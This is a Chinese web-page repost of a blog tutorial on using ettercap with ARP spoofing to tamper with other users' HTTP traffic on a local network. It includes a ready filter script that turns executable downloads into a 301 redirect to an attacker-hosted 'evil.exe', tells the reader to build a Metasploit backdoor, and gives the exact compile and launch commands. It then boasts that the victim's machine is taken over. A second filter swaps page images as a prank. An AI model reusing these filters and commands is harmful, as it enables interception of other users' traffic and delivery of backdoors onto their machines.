当前位置: 移动技术网 > 网络运营>安全>工具 > 强大的嗅探工具ettercap使用教程

强大的嗅探工具ettercap使用教程

2018年04月03日  | 移动技术网网络运营  | 我要评论

ettercap是LINUX下一个强大的欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模 式里才能用)
下面我们来说说咋吧数据插进去
 
首先你得有自己个规则,默认的ETTERCAP自带了几个
 
 
 
brk@Dis9Team:/usr/share/ettercap$ ls
ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
etter.dns     etter.filter.examples  etter.finger.mac  etter.services
etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
etter.filter  etter.filter.ssh       etterlog.dtd
brk@Dis9Team:/usr/share/ettercap$
在入侵过程种,这些达不到我们想要的,来看这个规则
 
# replace rmccurdy with your website
# replace the url with what ever exe you like
 
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
     msg("zapped Accept-Encoding!n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
 
}
 
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXEn");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothingn");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.dis9.com/evil.exe
");
msg("redirect successn");
 
}
}
他吧80端口请求的数据application(也就是附件)301重定向成了他自己的EXE程序,这个EXE必须是Win32程序,也就是命令行的。
下面来尝试一下,用MSF生成个TCP后门,再把Location: http://www.dis9.com/evil.exe 改成自己的地址
用etterfilter吧规则文件编译成ettercap能读懂的文件,进行欺骗
 
brk@Dis9Team:/$ etterfilter exe.filter -o exe.ef
brk@Dis9Team:/$ sudo ettercap -T -q -i vboxnet0 -F exe.ef -M ARP // // -P autoadd
模式必须是ARP的,当这个网段的某机子下载某WIN程序的时候,

神奇的东西出现了

\

程序已经被替换成了我们的后门

当他点击运行的时候,我们获得了他的权限

\

如果你是一个喜欢恶作剧的人,

你还可以看看这个脚本 他吧80端口请求的图片替换成了本地的
 
http://www.irongeek.com/i.php?page=security/ettercapfilter
 
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
       # note: replacement string is same length as original string
     msg("zapped Accept-Encoding!n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=http://up.2cto.com/2012/0508/20120508011856683.jpeg" ");
   replace("IMG SRC=", "img src=http://up.2cto.com/2012/0508/20120508011856683.jpeg" ");
   msg("Filter Ran.n");
}
编译运行试试
 
root@Dis9Team:/tmp# etterfilter 1 -o pic.ef
 
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 
 12 protocol tables loaded:
     DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
 
 11 constants loaded:
     VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
 
 Parsing source file '1'  done.
 
 Unfolding the meta-tree  done.
 
 Converting labels to real offsets  done.
 
 Writing output to 'pic.ef'  done.
 
 -> Script encoded into 16 instructions.
root@Dis9Team:/tmp# ettercap -T -q -i vboxnet0 -F pic.ef -M ARP // // -P autoadd
 
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 
Content filters loaded from pic.ef...
Listening on vboxnet0... (Ethernet)
 
vboxnet0 ->    0A:00:27:00:00:00       192.1.1.200     255.255.255.0
运行没出粗 这样别人访问的网页图片全部都是你设置的了


网卡的原因我只能本地测试啦

\

这是正常的 别人访问后

\

\


摘自:http://brk.dis9.com/powerful-sniffing-tool-ettercap-the-using-the-tutorial-i-deceive-rules.html

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

  • 网络刺客2使用指南

    网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找... [阅读全文]

  • 冰河”启示录

    冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)... [阅读全文]

  • tfn2k使用方法和对策(3)

        tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm... [阅读全文]

  • tfn2k使用方法和对策(2)

        tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是... [阅读全文]

  • 火凤凰2.4使用教程

    今次给大家推荐的是阿风哥的作品:无赖小子。(way).说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗... [阅读全文]

  • tfn2k使用方法和对策(1)

        tfn2k使用方法和对策(1) 作者:佳佳 今年年初,一些黑客使用DDoS向Yahoo,eBay等著名站点发起攻击,并且使y... [阅读全文]

  • 火凤凰2.0使用教程

    火凤凰是国产木马里最先使用反弹端口的木马,其避开防火墙的能力极其出色,DELPHI编写,功能较多但是不太好用,而且没有配置服务端的改变端口功能,相对而言比较危险... [阅读全文]

  • Nmap网络安全扫描器说明(5)

    Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例-------... [阅读全文]

  • Nmap网络安全扫描器说明(3)

    Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项-------... [阅读全文]

  • 不需要任何密码就能达到进入中有冰河的机器!!!

    不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此... [阅读全文]
验证码:
最近更新的文章
大家感兴趣的文章
移动技术网